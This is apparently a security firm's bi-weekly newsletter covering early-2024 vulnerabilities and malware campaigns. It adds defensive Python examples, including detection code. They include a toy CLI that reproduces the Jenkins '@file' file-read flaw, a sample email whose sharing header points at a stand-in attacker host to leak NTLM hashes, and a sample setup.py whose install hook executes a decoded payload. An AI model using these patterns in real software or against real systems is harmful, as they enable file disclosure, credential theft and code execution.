The HighPoint Security Hub – Jan 31, 2024

Navigating the ever-evolving landscape of cyber threats is a constant challenge. “The Security Hub” is here to make it easier, offering a succinct overview of the most pressing developments from the past two weeks.

This edition covers patches for the LeftoverLocals GPU vulnerability affecting Apple, AMD and other vendors’ products, the Kasseika ransomware’s use of bring-your-own-vulnerable-driver (BYOVD) attacks, security fixes from Apple, Jenkins and other major vendors, and continued concern over malware loader activity and vulnerabilities in widely used tools and platforms.


Global Developments

  1. Researchers at Trail of Bits uncovered the LeftoverLocals vulnerability (CVE-2023-4969), affecting GPUs in Apple, AMD, Qualcomm, and Imagination Technologies products. Because affected GPUs do not clear local memory between kernel invocations, a local attacker can run their own GPU kernel and read data left behind by another process’s kernels; the researchers demonstrated this by recovering parts of a large language model’s responses from a co-resident process. Qualcomm and Apple have released patches, while AMD plans mitigations starting March 2024. Left unaddressed, the flaw is a serious concern for shared-GPU workloads, including AI inference. Read more.
  2. Jenkins, the open-source automation server, has resolved nine security flaws, including the critical CVE-2024-23897. The built-in command-line interface (CLI) uses an argument parser that expands an argument beginning with “@” into the contents of the file at that path, which lets an attacker read arbitrary files on the Jenkins controller file system. Attackers with “Overall/Read” permission can read entire files; those without it can still read the first three lines of a file from error messages. Reading binary secrets this way can enable remote code execution, CSRF protection bypass, and other attacks. Fixes shipped in Jenkins 2.442 and LTS 2.426.3; disabling CLI access is the recommended workaround until an upgrade is possible. Read more.
  3. Apple has issued security updates for iOS, iPadOS, macOS, tvOS, and Safari addressing a zero-day vulnerability (CVE-2024-23222) actively exploited in the wild. The flaw, a type confusion bug in the WebKit browser engine, could lead to arbitrary code execution when processing malicious web content. Apple fixed the issue with improved checks and acknowledged reports that it may have been exploited. This is the first zero-day patched by Apple in 2024. Read more.
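The Jenkins item above describes an argument parser that silently swaps “@path” for the lines of a file and then echoes those lines back in error messages. The following toy CLI dispatcher, an added example and not Jenkins code, models that behaviour next to the fixed behaviour of treating the argument literally. The command name, the three-argument limit and the secret file are assumptions made for illustration.

```python
# Added example (not Jenkins code): a toy CLI dispatcher that models the
# "@file" argument-expansion feature behind CVE-2024-23897, beside the fixed
# behaviour of treating the argument literally.
import os
import tempfile

MAX_REPORTED = 3  # assumption: the toy command echoes at most three rejected arguments


def expand_at_files(argv):
    """Vulnerable behaviour: an argument '@<path>' is replaced by the lines of
    that file, one line per argument, as the parser feature did."""
    expanded = []
    for arg in argv:
        if arg.startswith("@") and len(arg) > 1:
            with open(arg[1:], encoding="utf-8", errors="replace") as fh:
                expanded.extend(line.rstrip("\n") for line in fh)
        else:
            expanded.append(arg)
    return expanded


def connect_node(argv, expand_at, known_nodes=frozenset({"builder-1"})):
    """Toy 'connect-node NAME...' command (assumed). Unknown names are echoed
    back in the error text, which is the channel that leaks file contents when
    expansion is enabled."""
    args = expand_at_files(argv) if expand_at else list(argv)
    unknown = [a for a in args if a not in known_nodes]
    if unknown:
        return "ERROR: No such node(s): " + ", ".join(unknown[:MAX_REPORTED])
    return "OK"


def demo():
    """Writes a constructed secret file and runs the command both ways.
    Returns (vulnerable_output, fixed_output)."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "master.key")
        with open(secret, "w", encoding="utf-8") as fh:
            fh.write("line1-secret\nline2-secret\nline3-secret\nline4-secret\n")
        attacker_argv = ["@" + secret]          # the only thing the attacker controls
        leaked = connect_node(attacker_argv, expand_at=True)
        safe = connect_node(attacker_argv, expand_at=False)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable:", leaked)
    print("fixed:     ", safe)
```

With expansion on, the error text carries the first three lines of the secret file, which matches the limited-permission case in the advisory; with expansion off, the error only echoes the literal “@/…/master.key” string.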


Commonly Used Tools and Gadgets

  1. Data security firm Varonis has disclosed a vulnerability (CVE-2023-35636) and three attack methods that exploit Microsoft Outlook and two Windows programs to leak NTLM hashes. Microsoft patched the Outlook flaw in its December 2023 Patch Tuesday updates; the other two methods remain unpatched. Varonis showed that an email carrying calendar-sharing headers whose sharing-configuration URL points at an attacker-controlled server causes Outlook to authenticate to that server when the recipient opens the shared item, exposing the user’s NTLM hash. The remaining methods abuse URI handlers in Windows Performance Analyzer and Windows File Explorer to trigger the same outbound authentication, exposing hashes to offline password cracking or relay. Read more.
  2. A critical misconfiguration named Sys:All has been discovered in Google Kubernetes Engine (GKE), affecting an estimated 250,000 active clusters. Cloud security firm Orca found that the issue stems from a misconception about the system:authenticated group in GKE, which includes any account authenticated with Google, not just identities belonging to the cluster’s organization. Where administrators have bound that group to a privileged role, any external actor with a Google account can take control of the cluster and proceed to further malicious activity. Google has responded by blocking bindings of the system:authenticated group to the cluster-admin role in GKE versions 1.28 and later. Read more.
  3. Juniper Networks has released out-of-band updates addressing two high-severity J-Web flaws in SRX Series firewalls and EX Series switches, affecting all Junos OS versions prior to the fixed releases. Discovered by watchTowr Labs, CVE-2024-21619 is a missing-authentication flaw that exposes sensitive configuration information, and CVE-2024-21620 is a cross-site scripting (XSS) flaw that can lead to command execution with the targeted user’s permissions. Fixes are provided in specified releases for each CVE. As a temporary mitigation, Juniper advises disabling J-Web or restricting access to trusted hosts until the updates are deployed. Read more.
  4. Citrix has warned of two zero-day vulnerabilities in NetScaler ADC and NetScaler Gateway that are being exploited in the wild. CVE-2023-6548 allows authenticated, low-privileged remote code execution on the management interface, while CVE-2023-6549 leads to denial of service. Affected versions include NetScaler ADC and NetScaler Gateway 14.1, 13.1, 13.0, and 12.1. Users of the end-of-life 12.1 branch are advised to upgrade to a supported version, and all users should keep the management interface off the internet. In a separate alert, VMware disclosed a critical missing-access-control flaw in Aria Automation (CVE-2023-34063), urging an upgrade to version 8.16. Read more.
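The Outlook item above turns on a message header that points Outlook at a UNC path on a host the attacker controls. The following mail-gateway check, an added example and not Varonis’s or Microsoft’s code, parses raw message headers, flags any UNC or file:// reference to a host outside a trusted list, and escalates when the reference sits in a calendar-sharing message. The header names checked (Content-Class, x-sharing-config-url) are the ones described in the published research; the sample messages and the trusted-host list are constructed for the example.

```python
# Added example (not Varonis's or Microsoft's code): flag inbound messages
# whose headers point Outlook at a UNC path or file:// URL on an untrusted host.
import re
from email import message_from_string
from email.policy import default

UNC_RE = re.compile(r"\\\\([A-Za-z0-9][A-Za-z0-9.\-]*)\\[^\s\"'<>]+")
FILE_URL_RE = re.compile(r"file://+([A-Za-z0-9][A-Za-z0-9.\-]*)/[^\s\"'<>]*", re.IGNORECASE)


def find_remote_paths(raw_message):
    """Returns (header_name, host, reference) for each UNC or file:// reference
    found in any header of the message."""
    msg = message_from_string(raw_message, policy=default)
    hits = []
    for name, value in msg.items():
        text = str(value)
        for pattern in (UNC_RE, FILE_URL_RE):
            for m in pattern.finditer(text):
                hits.append((name.lower(), m.group(1).lower(), m.group(0)))
    return hits


def assess_message(raw_message, trusted_hosts=frozenset()):
    """Returns a list of reasons to quarantine the message; empty means clean."""
    msg = message_from_string(raw_message, policy=default)
    content_class = str(msg.get("Content-Class", "")).strip().lower()
    reasons = []
    for header, host, ref in find_remote_paths(raw_message):
        if host in trusted_hosts:
            continue  # internal file servers are expected in sharing invitations
        reasons.append(f"header '{header}' references untrusted host {host}: {ref}")
        if content_class == "sharing" and header == "x-sharing-config-url":
            reasons.append("calendar-sharing message whose config URL leaves the "
                           "organization (NTLM hash leak pattern)")
    return reasons


# Constructed samples (not real captures). Python string escaping turns
# "\\\\" into the two backslashes that start a UNC path.
SUSPICIOUS_EMAIL = (
    "From: sender@example.test\n"
    "To: victim@corp.example\n"
    "Subject: Shared calendar\n"
    "Content-Class: Sharing\n"
    "x-sharing-config-url: \\\\attacker.example.test\\share\\calendar.ics\n"
    "Content-Type: text/plain\n"
    "\n"
    "Please open the shared calendar.\n"
)

BENIGN_EMAIL = (
    "From: colleague@corp.example\n"
    "To: victim@corp.example\n"
    "Subject: Team calendar\n"
    "Content-Class: Sharing\n"
    "x-sharing-config-url: \\\\fileserver.corp.example\\calendars\\team.ics\n"
    "Content-Type: text/plain\n"
    "\n"
    "Shared from the internal file server.\n"
)

if __name__ == "__main__":
    trusted = frozenset({"fileserver.corp.example"})  # assumed internal host list
    for label, raw in (("suspicious", SUSPICIOUS_EMAIL), ("benign", BENIGN_EMAIL)):
        print(label, assess_message(raw, trusted) or "clean")
```

Scanning every header, not just the sharing one, also catches the same UNC pattern if it is moved into another header Outlook resolves; the trusted-host list keeps legitimate internal sharing invitations from being quarantined.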
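The GKE item above comes down to a single question an operator can answer from RBAC data: is any broad built-in group bound to a privileged role? The following audit script is an added example, not Google’s or Orca’s code. It reads the JSON that `kubectl get clusterrolebindings -o json` prints, skips the Kubernetes bootstrap bindings that legitimately give system:authenticated read-only discovery access, and reports everything else, including the system:unauthenticated and system:serviceaccounts groups, which the item does not mention but which deserve the same scrutiny. The sample bindings are constructed.

```python
# Added example (not Google's or Orca's code): audit ClusterRoleBindings for
# grants to broad built-in groups. Input format is the JSON printed by
# `kubectl get clusterrolebindings -o json`; the sample below is constructed.
import json
import sys

BROAD_GROUPS = {"system:authenticated", "system:unauthenticated", "system:serviceaccounts"}
# Kubernetes bootstrap bindings that legitimately grant system:authenticated
# read-only discovery access. They are skipped only while they still point at
# the same-named ClusterRole; a bootstrap binding re-pointed at cluster-admin
# is reported like any other.
BOOTSTRAP_BINDINGS = {"system:basic-user", "system:discovery", "system:public-info-viewer"}


def audit_cluster_role_bindings(crb_json):
    """Returns one finding per (binding, broad group) pair, most severe first."""
    findings = []
    for item in crb_json.get("items", []):
        name = item["metadata"]["name"]
        role = item.get("roleRef", {}).get("name", "")
        if name in BOOTSTRAP_BINDINGS and role == name:
            continue
        for subject in item.get("subjects") or []:   # "subjects" may be absent
            if subject.get("kind") != "Group" or subject.get("name") not in BROAD_GROUPS:
                continue
            findings.append({
                "binding": name,
                "group": subject["name"],
                "role": role,
                "severity": "CRITICAL" if role == "cluster-admin" else "HIGH",
                "remediation": f"kubectl delete clusterrolebinding {name}",
            })
    findings.sort(key=lambda f: (f["severity"] != "CRITICAL", f["binding"]))
    return findings


# Constructed sample in the shape kubectl prints: one bootstrap binding, one
# cluster-admin grant to all Google-authenticated users, one read-only grant,
# and one ordinary service-account binding that must not be reported.
SAMPLE_CRBS = {
    "apiVersion": "v1",
    "kind": "List",
    "items": [
        {"metadata": {"name": "system:basic-user"},
         "roleRef": {"kind": "ClusterRole", "name": "system:basic-user"},
         "subjects": [{"kind": "Group", "name": "system:authenticated"}]},
        {"metadata": {"name": "all-users-admin"},
         "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
         "subjects": [{"kind": "Group", "name": "system:authenticated"}]},
        {"metadata": {"name": "everyone-can-view"},
         "roleRef": {"kind": "ClusterRole", "name": "view"},
         "subjects": [{"kind": "Group", "name": "system:authenticated"}]},
        {"metadata": {"name": "ci-deployer"},
         "roleRef": {"kind": "ClusterRole", "name": "edit"},
         "subjects": [{"kind": "ServiceAccount", "name": "deployer", "namespace": "ci"}]},
    ],
}

if __name__ == "__main__":
    # Pipe real data in: kubectl get clusterrolebindings -o json | python audit_crb.py
    data = SAMPLE_CRBS if sys.stdin.isatty() else json.load(sys.stdin)
    for f in audit_cluster_role_bindings(data):
        print(f"{f['severity']:8} {f['binding']}: {f['group']} -> {f['role']}  ({f['remediation']})")
```

A complete review also needs the namespaced RoleBindings (`kubectl get rolebindings -A -o json`), since a broad group bound to an `admin` Role in a single namespace is a smaller but real exposure; the same subject check applies there.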


Malware and Ransomware

  1. Ransomware group Kasseika is employing bring-your-own-vulnerable-driver (BYOVD) attacks, terminating antivirus processes using the Martini driver. The attack involves phishing links for initial access, use of remote administration tools, and exploitation of PsExec for execution. Kasseika utilizes the Martini.sys driver to disable security tools, employing a KILLAV mechanism for defense evasion. The ransomware, based on BlackMatter source code, then encrypts files using the ChaCha20 algorithm. Read more.
  2. A new threat actor has been observed using a sophisticated downloader named “CherryLoader” to gain administrator-level access on targeted systems. CherryLoader, written in Golang, masquerades as the legitimate “Cherrytree” note-taking software. Its modular design lets the threat actor swap payloads without recompiling the loader. In observed intrusions, CherryLoader deployed two publicly available Windows privilege escalation tools, PrintSpoofer and JuicyPotatoNG; both abuse the SeImpersonatePrivilege token privilege to obtain SYSTEM, PrintSpoofer through the Print Spooler service’s named pipe and JuicyPotatoNG through DCOM activation. The attackers used these tools to gain SYSTEM-level access and dropped a batch script, user.bat, for persistence and anti-analysis functions. Read more.
  3. ZLoader malware has re-emerged nearly two years after a takedown. The new version adds RSA encryption, an updated domain generation algorithm, and 64-bit Windows compatibility. ZLoader, originally an offshoot of the Zeus banking trojan, suffered a setback in 2022 after a takedown led by Microsoft. The latest builds resist analysis through junk code, string obfuscation, and a check that the binary is running under a specific filename. After a pause in activity, the group behind ZLoader is back, and loaders of this kind have historically served as a foothold for ransomware attacks. Read more.
  4. Malicious packages on the Python Package Index (PyPI) repository have been found delivering WhiteSnake Stealer malware on Windows systems. Uploaded by a threat actor named “WS,” packages like nigpal, figflix, and seGMM include Base64-encoded source code that drops the final malicious payload upon installation. WhiteSnake Stealer, targeting Windows users, has anti-VM mechanisms, communicates via Tor, and steals information, including from web browsers, cryptocurrency wallets, and various applications. Some rogue packages also feature clipper functionality to overwrite clipboard content for unauthorized transactions. The findings highlight a single malware author disseminating multiple info-stealing packages on PyPI. Read more.
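The PyPI item above rests on one mechanism: a setup.py that carries an encoded blob, decodes it, and executes the result while pip is installing the package. The following static scanner is an added example and not code from the report on the WhiteSnake packages. It parses setup.py with Python’s ast module (never importing or running it) and reports three patterns: exec/eval fed by a decoder call, a large encoded literal handed to a decoder, and an install-time hook registered through cmdclass. The samples are constructed; the encoded text in the “malicious” sample is a placeholder that the scanner never decodes or runs.

```python
# Added example (not from the WhiteSnake report): static scan of setup.py for
# the decode-then-execute and install-hook patterns used by install-time malware.
import ast
import sys

DECODER_NAMES = {"b64decode", "b32decode", "b16decode", "b85decode", "a85decode",
                 "unhexlify", "decompress"}
EXEC_NAMES = {"exec", "eval", "compile"}
LARGE_LITERAL = 200  # assumption: encoded literals at least this long are worth review


def _call_name(call):
    """Callee name for both bare calls (exec) and attribute calls (base64.b64decode)."""
    func = call.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return None


def scan_setup_source(source):
    """Parses (never executes) setup.py source. Returns (kind, lineno, detail) tuples."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node)
        if name in EXEC_NAMES:
            decoders = [_call_name(n) for n in ast.walk(node)
                        if isinstance(n, ast.Call) and _call_name(n) in DECODER_NAMES]
            if decoders:
                findings.append(("exec-of-decoded-payload", node.lineno,
                                 f"{name}() consumes the output of {decoders[0]}()"))
        elif name in DECODER_NAMES:
            for arg in node.args:
                if (isinstance(arg, ast.Constant) and isinstance(arg.value, (str, bytes))
                        and len(arg.value) >= LARGE_LITERAL):
                    findings.append(("large-encoded-literal", node.lineno,
                                     f"{name}() over a {len(arg.value)}-char literal"))
        elif name == "setup":
            for kw in node.keywords:
                if kw.arg == "cmdclass":
                    findings.append(("install-hook", node.lineno,
                                     "setup() overrides cmdclass: code runs during pip install"))
    return findings


# Constructed samples. The encoded text is filler ("QUFB" repeated) and is never
# decoded or executed by this scanner.
MALICIOUS_SETUP = (
    "import base64\n"
    "from setuptools import setup\n"
    "from setuptools.command.install import install\n"
    "\n"
    "class PostInstall(install):\n"
    "    def run(self):\n"
    "        install.run(self)\n"
    "        exec(base64.b64decode('" + "QUFB" * 100 + "'))\n"
    "\n"
    "setup(name='figflix', version='0.1', cmdclass={'install': PostInstall})\n"
)

BENIGN_SETUP = (
    "from setuptools import setup\n"
    "setup(name='goodpkg', version='1.0', packages=['goodpkg'])\n"
)

if __name__ == "__main__":
    # Usage: python scan_setup.py path/to/setup.py   (defaults to the constructed sample)
    source = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else MALICIOUS_SETUP
    for kind, lineno, detail in scan_setup_source(source):
        print(f"line {lineno}: {kind}: {detail}")
```

Run it against the extracted sdist before installation (`pip download --no-deps --no-binary :all: <pkg>` then unpack), since scanning happens before any setup.py code has a chance to execute; a cmdclass override on its own is legitimate in many packages, so it is the combination with a decoded payload that warrants blocking.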

Wrapping It Up

The cybersecurity landscape is ever-changing and staying informed is paramount to staying protected. Keep an eye on these developments and ensure your security measures are up to the task.

Do our bi-weekly insights prove valuable to you? Have you noticed trends or threads that you think our community should know about? Connect and share your insights with us on LinkedIn.

Get in touch to learn more